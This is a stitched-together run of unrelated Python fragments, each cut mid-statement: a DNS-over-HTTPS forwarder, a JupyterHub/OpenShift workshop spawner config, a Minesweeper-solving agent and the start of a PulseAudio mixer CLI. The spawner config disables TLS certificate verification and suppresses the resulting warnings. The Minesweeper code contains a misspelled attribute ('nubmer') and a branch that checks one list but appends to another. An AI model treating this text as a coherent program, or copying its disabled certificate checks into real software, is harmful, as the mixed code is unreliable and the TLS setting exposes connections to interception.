logging.info(resolver.get_stats())
except (KeyboardInterrupt, SystemExit):
pass
logging.info('Shutting down DNS over HTTPS forwarder')
wait_closers = []
for transport in transports:
transport.close()
if hasattr(transport, 'wait_closed'):
wait_closers.append(aio.create_task(transport.wait_closed()))
await aio.wait(wait_closers)
await aio.sleep(0.3)
class AsyncDnsUpstreamContext(metaclass=ABCMeta):
"""A base class used to manage upstream DNS server connections and metadata."""
RTT_WINDOW_SIZE: ClassVar[int] = 10
def __init__(self, host: str) -> None:
self.host = host
self.queries = 0
self.answers = 0
self._rtts = array.array('d', [0.0])
self._rtts_index: Iterator[int] = itertools.cycle(range(self.RTT_WINDOW_SIZE))
async def __aenter__(self) -> 'AsyncDnsUpstreamContext':
return self
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.aclose()
@property
def avg_rtt(self) -> float:
"""The average rtt or latency (in seconds) for DNS requests to this upstream DNS server."""
return statistics.fmean(self._rtts)
def add_rtt_sample(self, rtt: SupportsFloat) -> None:
"""Add a new rtt sample to help compute the average rtt for this upstream DNS server."""
i = next(self._rtts_index)
self._rtts[i:i+1] = array.array('d', [float(rtt)])
def get_stats(self) -> str:
"""Returns a formatted string of statistics for this upstream server."""
return f'{self.host} (rtt: {self.avg_rtt:.3f} s, queries: {self.queries}, answers: {self.answers})'
@abstractmethod
async def aforward_query(self, query: bytes) -> bytes:
"""Resolve a DNS query via forwarding to a upstream DNS server.
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet.
Notes:
This coroutine is be safely cancellable. That is, even if the
coroutine is cancelled it still leaves any internal state
it uses in a consistent and usable state.
"""
...
@abstractmethod
async def aclose(self) -> None:
"""Close any open connections to the upstream DNS server."""
...
class AsyncDohUpstreamContext(AsyncDnsUpstreamContext):
"""A class used to manage upstream DoH server connections and metadata."""
SESSION_LIMITS: ClassVar[httpx.Limits] = httpx.Limits(max_keepalive_connections=1, max_connections=3, keepalive_expiry=60.0)
SESSION_TIMEOUTS: ClassVar[httpx.Timeout] = httpx.Timeout(None)
def __init__(self, url: str) -> None:
super().__init__(url)
self.session = httpx.AsyncClient(
limits=self.SESSION_LIMITS,
timeout=self.SESSION_TIMEOUTS,
headers={'accept': 'application/dns-message'},
http2=True)
async def aforward_post(self, query: bytes) -> Tuple[bytes, float]:
"""Resolve a DNS query via forwarding to a upstream DoH server (POST).
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet and rtt sample.
Notes:
Using DNS over HTTPS POST format as described here:
https://datatracker.ietf.org/doc/html/rfc8484
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
# Send HTTP request to upstream DoH server and wait for the response
response = await aio.shield(
self.session.post(
self.host,
headers={'content-type': 'application/dns-message'},
content=query))
# Parse HTTP response
response.raise_for_status()
answer = response.read()
rtt = response.elapsed.total_seconds()
# Return the DNS answer
return (answer, rtt)
async def aforward_get(self, query: bytes) -> Tuple[bytes, float]:
"""Resolve a DNS query via forwarding to a upstream DoH server (GET).
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet and rtt sample.
Notes:
Using DNS over HTTPS GET format as described here:
https://datatracker.ietf.org/doc/html/rfc8484
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
# Encode DNS query into url
url = ''.join([self.host, '?dns=', base64.urlsafe_b64encode(query).rstrip(b'=').decode()])
# Send HTTP request to upstream DoH server and wait for the response
response = await aio.shield(self.session.get(url))
# Parse HTTP response
response.raise_for_status()
answer = response.read()
rtt = response.elapsed.total_seconds()
# Return the DNS answer
return (answer, rtt)
async def aforward_query(self, query: bytes) -> bytes:
self.queries += 1
query = memoryview(query)
qid = query[:2]
# Forward the DNS query to the upstream DoH server
try:
logging.debug(f'Sending query {qid.hex()} to {self.host} --->')
answer, rtt = await self.aforward_post(b''.join([b'\0' * 2, query[2:]]))
self.add_rtt_sample(rtt)
self.answers += 1
logging.debug(f'Receiving answer {qid.hex()} from {self.host} ({rtt}) <---')
return b''.join([qid, memoryview(answer)[2:]])
# Raise connection error
except (httpx.NetworkError, httpx.RemoteProtocolError):
raise ConnectionError(f'DNS query to DoH server {self.host} failed due to network errors')
# Raise abnormal HTTP status codes
except httpx.HTTPStatusError as exc:
raise ConnectionError(f'received HTTP error status from DoH server {self.host} ({exc.response.status_code})')
async def aclose(self) -> None:
await self.session.aclose()
class AsyncDnsResolver:
"""A class that manages upstream DNS server contexts and resolves DNS queries."""
DEFAULT_QUERY_TIMEOUT: ClassVar[float] = 3.0
def __init__(self, upstreams: Iterable[str], context_class: Type[AsyncDnsUpstreamContext]) -> None:
self._upstreams = tuple(context_class(upstream) for upstream in upstreams)
if not self._upstreams:
raise ValueError('iterable of upstreams must have at least one entry')
async def __aenter__(self) -> 'AsyncDnsResolver':
return self
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.aclose()
@property
def queries(self) -> int:
return sum(upstream.queries for upstream in self._upstreams)
@property
def answers(self) -> int:
return sum(upstream.answers for upstream in self._upstreams)
@property
def avg_rtt(self) -> float:
return statistics.fmean(upstream.avg_rtt for upstream in self._upstreams)
def get_stats(self) -> str:
"""Returns a formatted string of statistics for this resolver."""
return f'Statistics for resolver at 0x{id(self)} (avg_rtt: {self.avg_rtt:.3f} s, total_queries: {self.queries}, total_answers: {self.answers})'
async def aresolve(self, query: bytes, timeout: float = DEFAULT_QUERY_TIMEOUT) -> bytes:
"""Resolve a DNS query via forwarding to upstream DNS servers.
Params:
query - A wireformat DNS query packet.
timeout - The maximum amount of time (in seconds) to wait for the receipt of the DNS answer packet.
Returns:
A wireformat DNS answer packet.
"""
# Forward the DNS query and return the DNS answer
# (perform a staggered race and accept the earliest response)
async def astaggered_resolution(upstreams: Sequence[AsyncDnsUpstreamContext], period: float) -> bytes:
assert len(upstreams) > 0
winner: Task = None
racers: Set[Task] = set()
errors: List[BaseException] = []
# Wait for the first racer to finish and cleanup exceptions
async def await_first_racer(timeout: float = None) -> bool:
nonlocal winner
nonlocal racers
nonlocal errors
done, racers = await aio.wait(racers, timeout=timeout, return_when=aio.FIRST_COMPLETED)
for racer in done:
error = racer.exception()
if error is None:
winner = racer
break
else:
errors.append(error)
return winner is not None
try:
for upstream in upstreams:
racers.add(aio.create_task(upstream.aforward_query(query)))
if await await_first_racer(period):
return winner.result()
while racers:
if await await_first_racer():
return winner.result()
finally:
for loser in racers:
loser.cancel()
def raise_multi_error(errors: Iterable[BaseException]) -> None:
class MultiError(*frozenset(type(error) for error in errors)):
pass
raise MultiError
assert len(errors) == len(upstreams)
raise_multi_error(errors)
# Weighted random shuffle the upstream servers by average latency
k = len(self._upstreams)
rtts = tuple(upstream.avg_rtt for upstream in self._upstreams)
max_rtt = max(rtts)
weights = (max_rtt - rtt + 0.001 for rtt in rtts)
upstreams = random.choices(self._upstreams, weights=weights, k=k)
period = (timeout / 2) / k if timeout is not None else 0.1
# Forward the DNS query and return the DNS answer
try:
return await aio.wait_for(astaggered_resolution(upstreams, period), timeout)
# Raise timeout error
except aio.TimeoutError:
raise TimeoutError(f'DNS query expired and was cancelled')
async def aclose(self) -> None:
"""Close all upstream DoH server connections."""
for upstream in self._upstreams:
await upstream.aclose()
class UdpResolverProtocol(aio.DatagramProtocol):
"""Protocol for serving UDP DNS requests via a DnsResolver instance."""
def __init__(self, resolver: AsyncDnsResolver) -> None:
self.resolver = resolver
self.buffer = []
self.worker = None
def connection_made(self, transport: DatagramTransport) -> None:
self.transport = transport
def datagram_received(self, data: bytes, peer: Tuple[str, int]) -> None:
logging.debug(f'Got UDP DNS query from {peer}')
# Add query to buffer
self.buffer.append((peer, data))
# Schedule query processing task if necessary
if self.worker is None:
self.worker = aio.create_task(self.ahandle_queries())
async def ahandle_queries(self) -> None:
while self.buffer:
tasks = set(aio.create_task(self.ahandle_query(peer, query)) for peer, query in self.buffer)
del self.buffer[:]
while tasks:
done, tasks = await aio.wait(tasks, timeout=0.05)
for task in done:
error = task.exception()
if error is None:
peer, answer = task.result()
self.transport.sendto(answer, peer)
else:
logging.warning(f'UDP DNS query resolution encountered an error - {error!r}')
self.worker = None
async def ahandle_query(self, peer: Tuple[str, int], query: bytes) -> Tuple[Tuple[str, int], bytes]:
return (peer, await self.resolver.aresolve(query))
class TcpResolverProtocol:
"""Protocol for serving TCP DNS requests via a DnsResolver instance."""
def __init__(self, resolver: AsyncDnsResolver) -> None:
self.resolver = resolver
async def ahandle_peer(self, reader: StreamReader, writer: StreamWriter) -> None:
"""Read all DNS queries from the peer stream and schedule their resolution via a DnsResolver instance."""
tasks: Union[List[Task], Set[Task]] = []
wlock = aio.Lock()
logging.debug(f'Got TCP DNS query stream from {writer.transport.get_extra_info("peername")}')
while True:
# Parse a DNS query packet off of the wire
try:
query_size = int.from_bytes(await reader.readexactly(2), 'big')
query = await reader.readexactly(query_size)
# Check if our peer has finished writing to the stream
except aio.IncompleteReadError:
break
# Schedule the processing of the query
tasks.append(aio.create_task(self.ahandle_query(writer, wlock, query)))
# Wait for all scheduled query processing to finish
while tasks:
done, tasks = await aio.wait(tasks, return_when=aio.FIRST_COMPLETED)
for task in done:
error = task.exception()
if error is not None:
logging.warning(f'TCP DNS query resolution encountered an error - {error!r}')
if not writer.is_closing():
# Indicate we are done writing to the stream
if writer.can_write_eof():
writer.write_eof()
# Close the stream
writer.close()
await writer.wait_closed()
async def ahandle_query(self, writer: StreamWriter, wlock: Lock, query: bytes) -> None:
"""Resolve a DNS query and write the DNS answer to the peer stream."""
if writer.is_closing():
return
# Resolve DNS query
answer = await self.resolver.aresolve(query)
if writer.is_closing():
return
# Create the DNS answer packet
answer_size = len(answer).to_bytes(2, 'big')
answer = b''.join([answer_size, answer])
# Write the DNS answer to the peer stream
async with wlock:
if writer.is_closing():
return
await writer.drain()
if writer.is_closing():
return
writer.write(answer)
if __name__ == '__main__':
# Handle command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--listen-address', nargs='+', default=DEFAULT_LISTEN_ADDRESSES,
help='addresses to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-p', '--listen-port', nargs='+', type=int, default=DEFAULT_LISTEN_PORTS,
help='ports to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-u', '--upstreams', nargs='+', default=DEFAULT_UPSTREAMS,
help='upstream servers to forward DNS queries and requests to (default: %(default)s)')
parser.add_argument('-t', '--tcp', action='store_true', default=False,
help='serve TCP based queries and requests along with UDP (default: %(default)s)')
parser.add_argument('-f', '--file', default=None,
help='file to store logging output to (default: %(default)s)')
parser.add_argument('-d', '--debug', action='store_true', default=False,
help='enable debugging on the internal asyncio event loop (default: %(default)s)')
args = parser.parse_args()
# Setup logging
log_level = 'DEBUG' if args.debug | |
# This file provides common configuration for the different ways that
# the deployment can run. Configuration specific to the different modes
# will be read from separate files at the end of this configuration
# file.
import os
import json
import string
import yaml
import threading
import time
import requests
import wrapt
from tornado import gen
from kubernetes.client.rest import ApiException
from kubernetes.client.configuration import Configuration
from kubernetes.config.incluster_config import load_incluster_config
from kubernetes.client.api_client import ApiClient
from openshift.dynamic import DynamicClient, Resource
from openshift.dynamic.exceptions import ResourceNotFoundError
# The workshop name and configuration type are passed in through the
# environment. The applicaton name should be the value used for the
# deployment, and more specifically, must match the name of the route.
workshop_name = os.environ.get('WORKSHOP_NAME')
application_name = os.environ.get('APPLICATION_NAME')
if not workshop_name:
workshop_name = 'homeroom'
if not application_name:
application_name = workshop_name
print('INFO: Workshop name is %r.' % workshop_name)
print('INFO: Application name is %r.' % application_name)
configuration_type = os.environ.get('CONFIGURATION_TYPE', 'hosted-workshop')
print('INFO: Configuration type is %r.' % configuration_type)
homeroom_link = os.environ.get('HOMEROOM_LINK')
print('INFO: Homeroom link is %r.' % homeroom_link)
homeroom_name = os.environ.get('HOMEROOM_NAME')
print('INFO: Homeroom name is %r.' % homeroom_name)
# Work out the service account name and name of the namespace that the
# deployment is in.
service_account_path = '/var/run/secrets/kubernetes.io/serviceaccount'
service_account_name = '%s-spawner' % application_name
print('INFO: Service account name is %r.' % service_account_name)
with open(os.path.join(service_account_path, 'namespace')) as fp:
namespace = fp.read().strip()
print('INFO: Namespace is %r.' % namespace)
full_service_account_name = 'system:serviceaccount:%s:%s' % (
namespace, service_account_name)
print('INFO: Full service account name is %r.' % full_service_account_name)
# Determine the Kubernetes REST API endpoint and cluster information,
# including working out the address of the internal image regstry.
kubernetes_service_host = os.environ['KUBERNETES_SERVICE_HOST']
kubernetes_service_port = os.environ['KUBERNETES_SERVICE_PORT']
kubernetes_server_url = 'https://%s:%s' % (kubernetes_service_host,
kubernetes_service_port)
kubernetes_server_version_url = '%s/version' % kubernetes_server_url
with requests.Session() as session:
response = session.get(kubernetes_server_version_url, verify=False)
kubernetes_server_info = json.loads(response.content.decode('UTF-8'))
image_registry = 'image-registry.openshift-image-registry.svc:5000'
if kubernetes_server_info['major'] == '1':
if kubernetes_server_info['minor'] in ('10', '10+', '11', '11+'):
image_registry = 'docker-registry.default.svc:5000'
# Initialise the client for the REST API used doing configuration.
#
# XXX Currently have a workaround here for OpenShift 4.0 beta versions
# which disables verification of the certificate. If don't use this the
# Python openshift/kubernetes clients will fail. We also disable any
# warnings from urllib3 to get rid of the noise in the logs this creates.
load_incluster_config()
import urllib3
urllib3.disable_warnings()
instance = Configuration()
instance.verify_ssl = False
Configuration.set_default(instance)
api_client = DynamicClient(ApiClient())
try:
image_stream_resource = api_client.resources.get(
api_version='image.openshift.io/v1', kind='ImageStream')
except ResourceNotFoundError:
image_stream_resource = None
try:
route_resource = api_client.resources.get(
api_version='route.openshift.io/v1', kind='Route')
except ResourceNotFoundError:
route_resource = None
ingress_resource = api_client.resources.get(
api_version='networking.k8s.io/v1', kind='Ingress')
# Create a background thread to dynamically calculate back link to the
# Homeroom workshop picker if no explicit link is provided, but group is.
def watch_for_homeroom():
global homeroom_link
while True:
if route_resource is not None:
try:
route = route_resource.get(namespace=namespace, name=homeroom_name)
scheme = 'http'
if route.metadata.annotations:
if route.metadata.annotations['homeroom/index'] == homeroom_name:
if route.tls and route.tls.termination:
scheme = 'https'
link = '%s://%s' % (scheme, route.spec.host)
if link != homeroom_link:
print('INFO: Homeroom link set to %s.' % link)
homeroom_link = link
except ApiException as e:
if e.status != 404:
print('ERROR: Error looking up homeroom route. %s' % e)
except Exception as e:
print('ERROR: Error looking up homeroom route. %s' % e)
try:
ingress = ingress_resource.get(namespace=namespace, name=homeroom_name)
scheme = 'http'
if ingress.metadata.annotations:
if ingress.metadata.annotations['homeroom/index'] == homeroom_name:
if ingress.tls:
scheme = 'https'
link = '%s://%s' % (scheme, ingress.spec.rules[0].host)
if link != homeroom_link:
print('INFO: Homeroom link set to %s.' % link)
homeroom_link = link
except ApiException as e:
if e.status != 404:
print('ERROR: Error looking up homeroom ingress. %s' % e)
except Exception as e:
print('ERROR: Error looking up homeroom ingress. %s' % e)
time.sleep(15)
if not homeroom_link and homeroom_name:
thread = threading.Thread(target=watch_for_homeroom)
thread.daemon = True
thread.start()
# Workaround bug in minishift where a service cannot be contacted from a
# pod which backs the service. For further details see the minishift issue
# https://github.com/minishift/minishift/issues/2400.
#
# What these workarounds do is monkey patch the JupyterHub proxy client
# API code, and the code for creating the environment for local service
# processes, and when it sees something which uses the service name as
# the target in a URL, it replaces it with localhost. These work because
# the proxy/service processes are in the same pod. It is not possible to
# change hub_connect_ip to localhost because that is passed to other
# pods which need to contact back to JupyterHub, and so it must be left
# as the service name.
@wrapt.patch_function_wrapper('jupyterhub.proxy', 'ConfigurableHTTPProxy.add_route')
def _wrapper_add_route(wrapped, instance, args, kwargs):
def _extract_args(routespec, target, data, *_args, **_kwargs):
return (routespec, target, data, _args, _kwargs)
routespec, target, data, _args, _kwargs = _extract_args(*args, **kwargs)
old = 'http://%s:%s' % (c.JupyterHub.hub_connect_ip, c.JupyterHub.hub_port)
new = 'http://127.0.0.1:%s' % c.JupyterHub.hub_port
if target.startswith(old):
target = target.replace(old, new)
return wrapped(routespec, target, data, *_args, **_kwargs)
@wrapt.patch_function_wrapper('jupyterhub.spawner', 'LocalProcessSpawner.get_env')
def _wrapper_get_env(wrapped, instance, args, kwargs):
env = wrapped(*args, **kwargs)
target = env.get('JUPYTERHUB_API_URL')
old = 'http://%s:%s' % (c.JupyterHub.hub_connect_ip, c.JupyterHub.hub_port)
new = 'http://127.0.0.1:%s' % c.JupyterHub.hub_port
if target and target.startswith(old):
target = target.replace(old, new)
env['JUPYTERHUB_API_URL'] = target
return env
# Define all the defaults for the JupyterHub instance for our setup.
c.JupyterHub.port = 8080
c.JupyterHub.hub_ip = '0.0.0.0'
c.JupyterHub.hub_port = 8081
c.JupyterHub.hub_connect_ip = '%s-spawner' % application_name
c.ConfigurableHTTPProxy.api_url = 'http://127.0.0.1:8082'
c.Spawner.start_timeout = 180
c.Spawner.http_timeout = 60
c.KubeSpawner.port = 10080
c.KubeSpawner.common_labels = {
'app': '%s' % application_name
}
c.KubeSpawner.extra_labels = {
'spawner': configuration_type,
'class': 'session',
'user': '{username}'
}
c.KubeSpawner.uid = os.getuid()
c.KubeSpawner.fs_gid = os.getuid()
c.KubeSpawner.extra_annotations = {
"alpha.image.policy.openshift.io/resolve-names": "*"
}
c.KubeSpawner.cmd = ['start-singleuser.sh']
c.KubeSpawner.pod_name_template = '%s-user-{username}' % application_name
c.JupyterHub.admin_access = False
if os.environ.get('JUPYTERHUB_COOKIE_SECRET'):
c.JupyterHub.cookie_secret = os.environ[
'JUPYTERHUB_COOKIE_SECRET'].encode('UTF-8')
else:
c.JupyterHub.cookie_secret_file = '/opt/app-root/data/cookie_secret'
c.JupyterHub.db_url = '/opt/app-root/data/database.sqlite'
c.JupyterHub.authenticator_class = 'tmpauthenticator.TmpAuthenticator'
c.JupyterHub.spawner_class = 'kubespawner.KubeSpawner'
c.JupyterHub.logo_file = '/opt/app-root/src/images/HomeroomIcon.png'
c.Spawner.environment = dict()
c.JupyterHub.services = []
c.KubeSpawner.init_containers = []
c.KubeSpawner.extra_containers = []
c.JupyterHub.extra_handlers = []
# Determine amount of memory to allocate for workshop environment.
def convert_size_to_bytes(size):
multipliers = {
'k': 1000,
'm': 1000**2,
'g': 1000**3,
't': 1000**4,
'ki': 1024,
'mi': 1024**2,
'gi': 1024**3,
'ti': 1024**4,
}
size = str(size)
for suffix in multipliers:
if size.lower().endswith(suffix):
return int(size[0:-len(suffix)]) * multipliers[suffix]
else:
if size.lower().endswith('b'):
return int(size[0:-1])
try:
return int(size)
except ValueError:
raise RuntimeError('"%s" is not a valid memory specification. Must be an integer or a string with suffix K, M, G, T, Ki, Mi, Gi or Ti.' % size)
c.Spawner.mem_limit = convert_size_to_bytes(
os.environ.get('WORKSHOP_MEMORY', '512Mi'))
# Override the image details with that for the terminal or dashboard
# image being used. The default is to assume that a image stream with
# the same name as the application name is being used. The call to the
# function resolve_image_name() is to try and resolve to image registry
# when using image stream. This is to workaround issue that many
# clusters do not have image policy controller configured correctly.
#
# Note that we set the policy that images will always be pulled to the
# node each time when the image name is not explicitly provided. This is
# so that during development, changes to the terminal image will always
# be picked up. Someone developing a new image need only update the
# 'latest' tag on the image using 'oc tag'.
#
# Check for TERMINAL_IMAGE is for backward compatibility. Should use
# WORKSHOP_IMAGE now.
workshop_image = os.environ.get('WORKSHOP_IMAGE')
if not workshop_image:
workshop_image = os.environ.get('TERMINAL_IMAGE')
if not workshop_image:
c.KubeSpawner.image_pull_policy = 'Always'
workshop_image = '%s-session:latest' % application_name
def resolve_image_name(name):
# If no image stream resource we are on plain Kubernetes.
if image_stream_resource is None:
return name
# If the image name contains a slash, we assume it is already
# referring to an image on some image registry. Even if it does
# not contain a slash, it may still be hosted on docker.io.
if name.find('/') != -1:
return name
# Separate actual source image name and tag for the image from the
# name. If the tag is not supplied, default to 'latest'.
parts = name.split(':', 1)
if len(parts) == 1:
source_image, tag = parts, 'latest'
else:
source_image, tag = parts
# See if there is an image stream in the current project with the
# target name.
try:
image_stream = image_stream_resource.get(namespace=namespace,
name=source_image)
except ApiException as e:
if e.status not in (403, 404):
raise
return name
# If we get here then the image stream exists with the target name.
# We need to determine if the tag exists. If it does exist, we
# extract out the full name of the image including the reference
# to the image registry it is hosted on.
if image_stream.status.tags:
for entry in image_stream.status.tags:
if entry.tag == tag:
registry_image = image_stream.status.dockerImageRepository
if registry_image:
return '%s:%s' % (registry_image, tag)
# Use original value if can't find a matching tag.
return name
c.KubeSpawner.image = resolve_image_name(workshop_image)
# Work out | |
tile = col_to_tile.get(col)
# they are safe
if tile not in safe:
safe.append(tile)
# case when there are only negative coefficients on the left
if neg_onesCount > 0 and onesCount == 0:
for col in negList:
tile = col_to_tile.get(col)
# they are mines
if tile not in mines:
mines.append(tile)
# case when the total number of mines is possitive
if last > 0:
# ignore the negative coefficients
if onesCount == last:
for col in onesList:
tile = col_to_tile.get(col)
if tile not in safe:
mines.append(tile)
for col in negList:
tile = col_to_tile.get(col)
if tile not in mines:
safe.append(tile)
# case when the total number of mines is negative
if last < 0:
# ignore the possitive coefficients
if neg_onesCount == last:
for col in onesList:
tile = col_to_tile.get(col)
if tile not in safe:
safe.append(tile)
for col in negList:
tile = col_to_tile.get(col)
if tile not in mines:
mines.append(tile)
# update the knowledge base
if mines != []:
for _ in mines:
self.markMines(_)
# update the knowledge base and append to the safe queue
if safe != []:
for _ in safe:
if _ in self.unknown and _ not in self.safeQ:
self.safeQ.append(_)
# uncover all the safe ones
while (self.safeQ != deque([])):
# get the left most tile in the safe queue
cr = self.safeQ.popleft()
# update the knowledge base
self.logMove(AI.Action(1), cr[0], cr[1])
# return the action to the World
return Action(AI.Action(1), cr[0], cr[1])
""" Part V: Guesses """
# assign heuristics to each tile: number of mines / number of unexplored
if self.unknown != []:
keys = self.unknown
values = [self.minesLeft/len(self.unknown)]*len(self.unknown)
self.prob = dict(zip(keys, values))
for col in range(0, self.col):
for row in range(0, self.row):
percept = self.board[col][row].number
num_mines = self.surMines(col, row)[0]
num_covered = self.surCovered(col, row)[0]
if ((percept > 0) and \
(num_covered - num_mines > 0)):
mines = self.surMines(col, row)[1]
covered = self.surCovered(col, row)[1]
for _ in covered:
if (_ not in mines) and (_ not in self.safeQ):
# only get the maximum probability of being a mine
self.prob[_] = max( ( percept-num_mines ) / \
num_covered,\
self.prob[_])
# get the corners first
corners = [(self.col-1, self.row-1), \
(0, 0), \
(self.col-1, 0), \
(0, self.row-1)]
for _ in corners:
if _ in self.unknown:
self.prob[_] = self.prob[_]-1
if (self.unknown != []):
# only uncover the least possible mines
minList = self.minList(self.prob)
self.safeQ.append(random.choice(minList))
if (self.minesLeft == 0):
return Action(AI.Action(0))
# uncover all the safe ones
while (self.safeQ != deque([])):
# get the left most tile in the safe queue
cr = self.safeQ.popleft()
# update the knowledge base
self.logMove(AI.Action(1), cr[0], cr[1])
# return the action to the World
return Action(AI.Action(1), cr[0], cr[1])
if (self.minesLeft == 0):
return Action(AI.Action(0))
###########################################################################
# organize movesMade #
###########################################################################
def markMines(self, coord):
""" update the KB if a mine is found """
col = coord[0]
row = coord[1]
if (col, row) not in self.mines:
self.minesLeft -= 1
self.mines.append((col, row))
self.board[col][row].mine = True
self.board[col][row].flag = True
self.unknown.remove((col, row))
def logLastMovePercept(self, number):
""" log the feedback percept number from the world """
if self.lastAction == AI.Action(1):
self.lastTile.covered = False
self.lastTile.number = number
def logMove(self, action, c, r):
""" log the last move """
self.cLast = c
self.rLast = r
self.lastTile = self.board[c][r]
self.lastAction = action
self.movesMade+=1
self.unknown.remove((c, r))
if (c, r) in list(self.prob.keys()):
self.prob.pop((c, r))
def __updateFirstMove(self) -> None:
""" update the first move in KB"""
c = self.startX
r = self.startY
self.unknown.remove((c, r))
# self.safeQ.append([c, r])
self.cLast = c
self.rLast = r
# update the 4 instances for this coordinates if necessary
self.board[c][r].covered = False
self.board[c][r].nubmer = 0
# update lastTile instance
self.lastTile = self.board[c][r]
self.lastAction = AI.Action(1)
###########################################################################
# print current board #
###########################################################################
def __createBoard(self) -> None:
""" create a board with given dimension and set moves limit"""
self.board = [[self.__Tile() for i in range(self.row)] for j in range(self.col)]
self.movesLimit = self.col * self.row * 2 - 1
def __printWorld(self) -> None:
""" Prints to console information about Minesweeper World """
self.KB()
self.__printAgentInfo()
def KB(self) -> None:
""" Print board for debugging """
print("================================================================")
print("================================================================")
print("================== Agent's current knowledge base ==============")
print("Number of mines: " + str(self.minesLeft))
print("Number of flags left: " + str(self.flagsLeft))
board_as_string = ""
print("", end=" ")
for r in range(self.row - 1, -1, -1):
print(str(r).ljust(2) + '|', end=" ")
for c in range(self.col):
self.__printTileInfo(c, r)
if (r != 0):
print('\n', end=" ")
column_label = " "
column_border = " "
for c in range(0, self.col):
column_border += "---"
column_label += str(c).ljust(3)
print(board_as_string)
print(column_border)
print(column_label)
print("================================================================")
print("================================================================")
print("================================================================")
def __printAgentInfo(self) -> None:
""" Prints information about the board that are useful to the user """
print("Tiles covered: " + \
str(self.coveredTiles) + \
" | Flags left: " + \
str(self.flagsLeft) + \
" | Last action: {} on {}"\
.format(self.lastAction, self.lastTile))
def __printTileInfo(self, c: int, r: int) -> None:
""" Checks tile attributes and prints accordingly """
if not self.board[c][r].covered and self.board[c][r].mine:
print('B ', end=" ")
elif not self.board[c][r].covered:
print(str(self.board[c][r].number) + ' ', end=" ")
elif self.board[c][r].flag:
print('? ', end=" ")
elif self.board[c][r].covered:
print('. ', end=" ")
###########################################################################
# Tile information #
###########################################################################
def __isInBounds(self, c: int, r: int) -> bool:
""" Returns true if given coordinates are within the boundaries """
if c < self.col and c >= 0 and \
r < self.row and r >= 0:
return True
return False
def frontier(self):
""" Return a list of tiles to be explored / for gaussian elimination """
frontier = []
for _ in self.unknown:
col = _[0]
row = _[1]
coord = (col, row)
if ( len(self.surTiles(coord)) - self.surCovered(col, row)[0] > 0 ):
frontier.append(_)
return frontier
def constraints(self):
""" Return a list of tiles next to the frontier as constraints """
constraints = []
for col in range(self.col):
for row in range(self.row):
if self.board[col][row].number > 0 and \
self.surUnknown(col, row)[0] > 0:
constraints.append((col, row))
return constraints
def surTiles(self, coord):
""" return a list of surrounding tiles' coordinates"""
tiles = set()
for c in range(coord[0]-1, coord[0]+2):
for r in range(coord[1]-1, coord[1]+2):
if self.__isInBounds(c, r) and (c, r) != coord:
tiles.add((c, r))
return tiles
def surUnknown(self, col, row):
""" return the total number of tiles that are unknown """
count = 0
noFlag = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r) and (c, r) != (col, row):
if self.known((c,r)) == False:
count+=1
noFlag.append((c, r))
return count, noFlag
def surCovered(self, col, row):
""" return the total number of covered tiles, and a list of coordinates
of those covered tiles surrounding the input coords """
count = 0
covered = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r) and (c, r) != (col, row):
if self.board[c][r].covered == True:
count+=1
covered.append((c, r))
return count, covered
def surMines(self, col, row):
""" return the number of mines, and a list of coordinates of those
mines surrounding the input coords """
count = 0
s_mines = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r):
if self.board[c][r].mine == True:
self.board[c][r].flag = True
count+=1
s_mines.append((c, r))
return count, s_mines
def set_known(self, set):
""" test if any of the tiles are unknown """
for i in set:
if self.known(i) == False:
return False
return True
def known(self, coord):
""" test if the tile is unknown (covered and not flagged) """
if self.board[coord[0]][coord[1]].covered == True and \
self.board[coord[0]][coord[1]].flag == False:
return False
return True
###########################################################################
# Multisquare method #
###########################################################################
def neighbor_test(self, col, row):
""" return the number of wild tiles, and a list of safe tiles if any """
safe = []
center = (col, row)
percept_center = self.board[col][row].number
# neighbors = self.surTiles((col, row))
neighbors_list = []
for co in range(col-2, col+3):
for ro in range(row-2, row+3):
if self.__isInBounds(co, ro) == True and \
(co, ro) != (col, row):
neighbors_list.append((co, ro))
neighbors | |
<reponame>mk-fg/pulseaudio-mixer-cli
#!/usr/bin/env python3
import itertools as it, operator as op, functools as ft
from collections import OrderedDict, defaultdict, deque, namedtuple
from contextlib import contextmanager
import os, sys, io, re, time, logging, configparser
import base64, hashlib, unicodedata, math
import signal, threading
from pulsectl import ( Pulse,
PulseEventTypeEnum as ev_t, PulseEventFacilityEnum as ev_fac, PulseEventMaskEnum as ev_m,
PulseLoopStop, PulseDisconnected, PulseIndexError )
class LogMessage:
def __init__(self, fmt, a, k): self.fmt, self.a, self.k = fmt, a, k
def __str__(self): return self.fmt.format(*self.a, **self.k) if self.a or self.k else self.fmt
class LogStyleAdapter(logging.LoggerAdapter):
def __init__(self, logger, extra=None):
super(LogStyleAdapter, self).__init__(logger, extra or {})
def log(self, level, msg, *args, **kws):
if not self.isEnabledFor(level): return
log_kws = {} if 'exc_info' not in kws else dict(exc_info=kws.pop('exc_info'))
msg, kws = self.process(msg, kws)
self.logger._log(level, LogMessage(msg, args, kws), (), log_kws)
get_logger = lambda name: LogStyleAdapter(logging.getLogger(name))
def uid_str( seed=None, length=4,
_seed_gen=it.chain.from_iterable(map(range, it.repeat(2**30))) ):
seed_bytes = length * 6 // 8
assert seed_bytes * 8 // 6 == length, [length, seed_bytes]
if seed is None: seed = '\0\0\0{:08x}'.format(next(_seed_gen))
seed = hashlib.sha256(bytes(seed, encoding='utf-8')).digest()[:seed_bytes]
return base64.urlsafe_b64encode(seed).decode()
class Conf:
def __repr__(self): return repr(vars(self))
adjust_step = 5.0 # percent, 0-100
# Volume values are relative to "normal" (non-soft-boosted) pulseaudio volume
max_volume = 1.0 # relative value, displayed as "100%"
